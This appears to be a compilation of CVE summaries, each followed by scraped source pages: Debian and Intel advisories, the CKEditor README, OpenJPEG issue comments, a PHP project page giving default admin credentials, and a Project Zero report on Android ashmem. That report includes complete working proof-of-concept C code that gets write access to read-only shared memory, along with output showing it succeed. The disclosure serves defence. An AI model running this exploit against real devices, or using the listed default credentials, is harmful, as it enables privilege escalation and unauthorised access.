Insufficient policy enforcement in extensions in Google Chrome prior to 80.0.3987.149 allowed an attacker who convinced a user to install a malicious extension to bypass site isolation via a crafted Chrome Extension.

**Debian Security Advisory**

Date Reported:

22 Mar 2020

Affected Packages:

chromium

Vulnerable:

Yes

Security database references:

In Mitre's CVE dictionary: CVE-2019-20503, CVE-2020-6422, CVE-2020-6424, CVE-2020-6425, CVE-2020-6426, CVE-2020-6427, CVE-2020-6428, CVE-2020-6429, CVE-2020-6449.  

More information:

Several vulnerabilities have been discovered in the chromium web browser.

*   CVE-2019-20503
    
    Natalie Silvanovich discovered an out-of-bounds read issue in the usrsctp library.
    
*   CVE-2020-6422
    
    David Manouchehri discovered a use-after-free issue in the WebGL implementation.
    
*   CVE-2020-6424
    
    Sergei Glazunov discovered a use-after-free issue.
    
*   CVE-2020-6425
    
    Sergei Glazunov discovered a policy enforcement error related to extensions.
    
*   CVE-2020-6426
    
    Avihay Cohen discovered an implementation error in the v8 javascript library.
    
*   CVE-2020-6427
    
    Man Yue Mo discovered a use-after-free issue in the audio implementation.
    
*   CVE-2020-6428
    
    Man Yue Mo discovered a use-after-free issue in the audio implementation.
    
*   CVE-2020-6429
    
    Man Yue Mo discovered a use-after-free issue in the audio implementation.
    
*   CVE-2020-6449
    
    Man Yue Mo discovered a use-after-free issue in the audio implementation.
    

For the oldstable distribution (stretch), security support for chromium has been discontinued.

For the stable distribution (buster), these problems have been fixed in version 80.0.3987.149-1~deb10u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to its security tracker page at: https://security-tracker.debian.org/tracker/chromium

CVE-2020-6425: Debian -- Security Information -- DSA-4645-1 chromium

A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax).

**CKEditor 4 - Smart WYSIWYG HTML editor **

  

 

A highly configurable WYSIWYG HTML editor with hundreds of features, from creating rich text content with captioned images, videos, tables, media embeds, emoji or mentions to pasting from Word and Google Docs and drag&drop image upload.

Supports a broad range of browsers, including legacy ones.

**Getting started****Using npm package**

npm install --save ckeditor

Use it on your website:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="./node\_modules/ckeditor/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Using CDN**

Load the CKEditor 4 script from CDN:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="https://cdn.ckeditor.com/4.13.0/standard/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Integrating with Angular, React and Vue.js**

Refer to official usage guides for the ckeditor4-angular, ckeditor4-react and ckeditor4-vue packages.

**Manual download**

Visit the CKEditor 4 download section on the CKEditor website to download ready-to-use CKEditor 4 packages or to create a customized CKEditor 4 build.

**Features**

*   Over 500 plugins in the Add-ons Repository.
*   Pasting from Microsoft Word, Excel and Google Docs.
*   Drag&drop image uploads.
*   Media embeds to insert videos, tweets, maps, slideshows.
*   Powerful clipboard integration.
*   Content quality control with Advanced Content Filter.
*   Extensible widget system.
*   Custom table selection.
*   Accessibility conforming to WCAG and Section 508.
*   Over 70 localizations available with full RTL support.

**Browser support**

  
IE / Edge

  
Firefox

  
Chrome

  
Chrome (Android)

  
Safari

  
iOS Safari

  
Opera

IE8, IE9, IE10, IE11, Edge

latest version

latest version

latest version

latest version

latest version

latest version

Find out more in the Browser Compatibility guide.

**Working with the ckeditor4 repository**

**Attention**: The code in this repository should be used locally and for development purposes only. We do not recommend using it in a production environment because the user experience will be very limited.

**Code installation**

There is no special installation procedure to install the development code. Simply clone it to any local directory and you are set.

**Available branches**

This repository contains the following branches:

*   **master** – Development of the upcoming minor release.
*   **stable** – Latest stable release tag point (non-beta).
*   **latest** – Latest release tag point (including betas).
*   **release/A.B.x** (e.g. 4.0.x, 4.1.x) – Release freeze, tests and tagging. Hotfixing.

Note that the master branch is under heavy development. Its code did not pass the release testing phase, though, so it may be unstable.

Additionally, all releases have their respective tags in the following form: 4.4.0, 4.4.1, etc.

**Samples**

The samples/ folder contains some examples that can be used to test your installation. Visit CKEditor 4 Examples for plenty of samples showcasing numerous editor features, with source code readily available to view, copy and use in your own solution.

**Code structure**

The development code contains the following main elements:

*   Main coding folders:
    *   core/ – The core API of CKEditor 4. Alone, it does nothing, but it provides the entire JavaScript API that makes the magic happen.
    *   plugins/ – Contains most of the plugins maintained by the CKEditor 4 core team.
    *   skin/ – Contains the official default skin of CKEditor 4.
    *   dev/ – Contains some developer tools.
    *   tests/ – Contains the CKEditor 4 tests suite.

**Building a release**

A release-optimized version of the development code can be easily created locally. The dev/builder/build.sh script can be used for that purpose:

A "release-ready" working copy of your development code will be built in the new dev/builder/release/ folder. An Internet connection is necessary to run the builder, for the first time at least.

**Testing environment**

Read more on how to set up the environment and execute tests in the CKEditor 4 Testing Environment guide.

**Reporting issues**

Use the CKEditor 4 GitHub issue page to report bugs and feature requests.

**License**

Copyright (c) 2003-2022, CKSource Holding sp. z o.o. All rights reserved.

For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license

CVE-2020-9281: GitHub - ckeditor/ckeditor4: The best enterprise-grade WYSIWYG editor. Fully customizable with countless features and plugins.

Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors Data Leakage Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-0548

Description: Cleanup errors in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 2.8 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

CVEID: CVE-2020-0549

Description: Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

A list of impacted products can be found here.

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest version firmware provided by the system manufacturer that addresses these issues. 

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode:   

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

Additional technical details about these vulnerabilities can be found at:  

https://software.intel.com/security-software-guidance/software-guidance/l1d-eviction-sampling

https://software.intel.com/security-software-guidance/software-guidance/vector-register-sampling

Additional Advisory Guidance on CVE-2020-0548, CVE 2020-0549 available here.

**Acknowledgements:**

Intel would like to thank the following individuals for finding, reporting and coordinating these vulnerabilities to us.

Intel thanks TU Graz and KU Leuven for disclosure of CVE-2020-0549.

Graz University of Technology: Moritz Lipp, Michael Schwarz, Daniel Gruss. 

KU Leuven: Jo Van Bulck.

Intel thanks VU Amsterdam, for disclosure of CVE-2020-0548 and CVE-2020-0549. VUSec group at VU Amsterdam: Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida. 

Researchers from TU Graz and Ku Leuven provided Intel with a Proof of Concept (POC) in May 2019 and researchers from VU Amsterdam provided Proof of Concept (POC) in October 2019. Intel subsequently confirmed each submission demonstrates CVE-2020-0549 individually.

**Revision History**

Revision

Date

Description

1.0

01/27/2020

Initial Release

1.1

06/09/2020

Updated Recomendations

1.2

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-0549: INTEL-SA-00329

OpenJPEG through 2.3.1 has a heap-based buffer overflow in opj_t1_clbl_decode_processor in openjp2/t1.c because of lack of opj_j2k_update_image_dimensions validation.

**Comments**

rouault added a commit to rouault/openjpeg that referenced this issue

Jan 11, 2020

rouault added a commit that referenced this issue

Jan 11, 2020

opj\_j2k\_update\_image\_dimensions(): reject images whose coordinates are beyond INT\_MAX (fixes #1228)

andreafioraldi added a commit to andreafioraldi/oss-fuzz that referenced this issue

Feb 17, 2021

Seems that some bugs in openjpeg can be triggered only in release mode.
More specifically, I was trying to reproduce uclouvain/openjpeg#1228 using the OSS-Fuzz harness and I failed.
I figured out that the bug is indeed reachable by the harness, but can be uncovered only in Release mode, otherwise, an assertion error blocks it.
I guess that they use assertions only in Debug mode (WTF) and remove them in Release.
So, IMO openjpeg should be fuzzed in Release mode as the configuration used in production is the one relevant for security.

inferno-chromium pushed a commit to google/oss-fuzz that referenced this issue

Feb 18, 2021

Seems that some bugs in openjpeg can be triggered only in release mode.
More specifically, I was trying to reproduce uclouvain/openjpeg#1228 using the OSS-Fuzz harness and I failed.
I figured out that the bug is indeed reachable by the harness, but can be uncovered only in Release mode, otherwise, an assertion error blocks it.
I guess that they use assertions only in Debug mode (WTF) and remove them in Release.
So, IMO openjpeg should be fuzzed in Release mode as the configuration used in production is the one relevant for security.

CVE-2020-6851: Heap buffer overflow in libopenjp2 · Issue #1228 · uclouvain/openjpeg

Use after free in media picker in Google Chrome prior to 79.0.3945.88 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-13767

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to XSS, as demonstrated by the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName parameter in add-product.php.

**Dairy Farm Shop Management System Using PHP and MySQL**

  

**Project Name**               :  Dairy Farm Shop Management System Project (DFSMS)

**Language Used                   :**  PHP

**Database                              :**  MySQL

**User Interface Design       :**  HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser                       :**  Mozilla, Google Chrome, IE8, OPERA

**Software                               :**  XAMPP / Wamp / Mamp/ Lamp (anyone)

DFSMS is a web-based application which manages the products of dairy shop. It has one module i.e. admin who manages all the functions of the dairy shop.

**Admin Features :**

**Dashboard:** In this section, admin can see all detail in brief like Total listed categories, companies, products and also see the sales.

**Category:** In this section, admin can add new categories and edit, delete old categories.

**Company:** In this section, admin can add new companies and edit, delete old companies.

**Product:** In this section, admin can add new products and edit old products.

**Search:** In this section, admin can search for a product then add the product into the cart and generate invoice /receipt.

**Invoices:** In this section, admin can view all generated invoices/receipts.

**Reports**: In this section, admin can generate two reports, one is B/w date and another one is for sales.

Admin can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Login Page**

**Login Page**

**Admin Dashboard**

**Admin Dashboard**

**Add Product Page**

**Add Product Page**

**Invoice Page**

**Invoice**

**How to run the Dairy Farm Shop Management System Project (DFSMS)**

1\. Download the zip file

2\. Extract the file and copy dfsms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4\. Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with name dfsms

6\. Import dfsms.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/dfsms

**Admin Credential**

**Username:** admin  
**Password:** Test@123

**View Demo——————————————**

Download Full Source Code (DFSMS)

Size: 9.84 MB

Version: V 1.1

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2020-5308: Dairy Farm Shop Management System Project, Dairy Farm Shop Management System in Php

In calc_vm_may_flags of ashmem.c, there is a possible arbitrary write to shared memory due to a permissions bypass. This could lead to local escalation of privilege by corrupting memory shared between processes, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-142938932

    Android: ashmem readonly bypasses via remap_file_pages() and ASHMEM_UNPINThis bug report describes two ways in which an attacker can modify the contentsof a read-only ashmem fd. I'm not sure at this point what the most interestinguser of ashmem is in the current Android release, but there are various users,including Chrome and a bunch of utility classes.In AOSP master, there is even code in<https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc>that uses ashmem for some JIT zygote mapping, which sounds extremelyinteresting.Android's ashmem kernel driver has an ->mmap() handler that attempts to lockdown created VMAs based on a configured protection mask such that in particularwrite access to the underlying shmem file can never be gained. It tries to dothis as follows (code taken from upstream Linuxdrivers/staging/android/ashmem.c):    static inline vm_flags_t calc_vm_may_flags(unsigned long prot)    {            return _calc_vm_trans(prot, PROT_READ,  VM_MAYREAD) |                   _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |                   _calc_vm_trans(prot, PROT_EXEC,  VM_MAYEXEC);    }    [...]    static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)    {            struct ashmem_area *asma = file->private_data;    [...]            /* requested protection bits must match our allowed protection mask */            if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &                calc_vm_prot_bits(PROT_MASK, 0)) {                    ret = -EPERM;                    goto out;            }            vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);    [...]            if (vma->vm_file)                    fput(vma->vm_file);            vma->vm_file = asma->file;    [...]            return ret;    }This ensures that the protection flags specified by the caller don't conflictwith the ->prot_mask, and it also clears the VM_MAY* flags as needed to preventthe user from afterwards adding new protection flags via mprotect().However, it improperly stores the backing shmem file, whose ->mmap() handlerdoes not enforce the same restrictions, in ->vm_file. An attacker can abuse thisthrough the remap_file_pages() syscall, which grabs the file pointer of anexisting VMA and calls its ->mmap() handler to create a new VMA. In effect,calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows anattacker to raise the VM_MAYWRITE bit, allowing the attacker to gain writeaccess to the ashmem allocation's backing file via mprotect().Reproducer (works both on Linux from upstream master in an X86 VM and on aPixel 2 at security patch level 2019-09-05 via adb):====================================================================user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/ioctl.h>#include <sys/wait.h>#define __ASHMEMIOC   0x77#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)int main(void) {  int ashmem_fd = open(\"/dev/ashmem\", O_RDWR);  if (ashmem_fd == -1)    err(1, \"open ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))    err(1, \"ASHMEM_SET_SIZE\");  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))    err(1, \"ASHMEM_SET_SIZE\");  mapping[0] = 'A';  printf(\"mapping[0] = '%c'\\", mapping[0]);  if (dup2(ashmem_fd, 42) != 42)    err(1, \"dup2\");  pid_t child = fork();  if (child == -1)    err(1, \"fork\");  if (child == 0) {    execl(\"./ashmem_remap_attacker\", \"ashmem_remap_attacker\", NULL);    err(1, \"execl\");  }  int status;  if (wait(&status) != child) err(1, \"wait\");  printf(\"mapping[0] = '%c'\\", mapping[0]);}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c#define _GNU_SOURCE#include <unistd.h>#include <sys/mman.h>#include <err.h>#include <stdlib.h>#include <stdio.h>int main(void) {  int ashmem_fd = 42;  /* sanity check */  char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (write_mapping == MAP_FAILED) {    perror(\"mmap ashmem writable failed as expected\");  } else {    errx(1, \"trivial mmap ashmem writable worked???\");  }  char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem readonly failed\");  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)    errx(1, \"mprotect ashmem writable worked???\");  if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))    err(1, \"remap_file_pages\");  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))    err(1, \"mprotect ashmem writable failed, attack didn't work\");  mapping[0] = 'X';  puts(\"attacker exiting\");}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.cuser@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.cuser@vm:~/ashmem_remap$ ./ashmem_remap_victimmapping[0] = 'A'mmap ashmem writable failed as expected: Operation not permittedattacker exitingmapping[0] = 'X'user@vm:~/ashmem_remap$ ====================================================================Interestingly, the (very much deprecated) syscall remap_file_pages() isn't evenlisted in bionic's SYSCALLS.txt, which would normally cause it to be blocked byAndroid's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permitsit for 32-bit ARM applications:    # b/36435222    int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags)  arm,x86,mipsashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately,there is no access control for these - even if you only have read-only access toan ashmem file, you can still mark pages in it as purgable, causing them toeffectively be zeroed out when the system is under memory pressure. Here's asimple test for that (to be run in an X86 Linux VM):====================================================================user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/ioctl.h>#include <sys/wait.h>#define __ASHMEMIOC   0x77#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)int main(void) {  int ashmem_fd = open(\"/dev/ashmem\", O_RDWR);  if (ashmem_fd == -1)    err(1, \"open ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))    err(1, \"ASHMEM_SET_SIZE\");  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))    err(1, \"ASHMEM_SET_SIZE\");  mapping[0] = 'A';  printf(\"mapping[0] = '%c'\\", mapping[0]);  if (dup2(ashmem_fd, 42) != 42)    err(1, \"dup2\");  pid_t child = fork();  if (child == -1)    err(1, \"fork\");  if (child == 0) {    execl(\"./ashmem_purge_attacker\", \"ashmem_purge_attacker\", NULL);    err(1, \"execl\");  }  int status;  if (wait(&status) != child) err(1, \"wait\");  printf(\"mapping[0] = '%c'\\", mapping[0]);}user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c#include <unistd.h>#include <stdlib.h>#include <fcntl.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/ioctl.h>struct ashmem_pin {  unsigned int offset, len;};#define __ASHMEMIOC   0x77#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)#define ASHMEM_UNPIN    _IOW(__ASHMEMIOC, 8, struct ashmem_pin)int main(void) {  struct ashmem_pin pin = { 0, 0 };  if (ioctl(42, ASHMEM_UNPIN, &pin))    err(1, \"unpin 42\");  /* ensure that shrinker doesn't get skipped */  int ashmem_fd = open(\"/dev/ashmem\", O_RDWR);  if (ashmem_fd == -1)    err(1, \"open ashmem\");  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))    err(1, \"ASHMEM_SET_SIZE\");  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);  if (mapping == MAP_FAILED)    err(1, \"mmap ashmem\");  if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))    err(1, \"unpin 42\");  /* simulate OOM */  system(\"sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'\");  puts(\"attacker exiting\");}user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.cuser@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.cuser@vm:~/ashmem_purging$ ./ashmem_purge_victimmapping[0] = 'A'attacker exitingmapping[0] = ''user@vm:~/ashmem_purging$ ====================================================================This bug is subject to a 90 day disclosure deadline. After 90 days elapseor a patch has been made broadly available (whichever is earlier), the bugreport will become visible to the public.Related CVE Numbers: CVE-2020-0009.Found by: jannh@google.com

CVE-2020-0009: Android ashmem Read-Only Bypasses ≈ Packet Storm

Out of bounds access in SwiftShader in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-5844

**Chrome Releases**

Release updates from the Chrome team

Tag

#chrome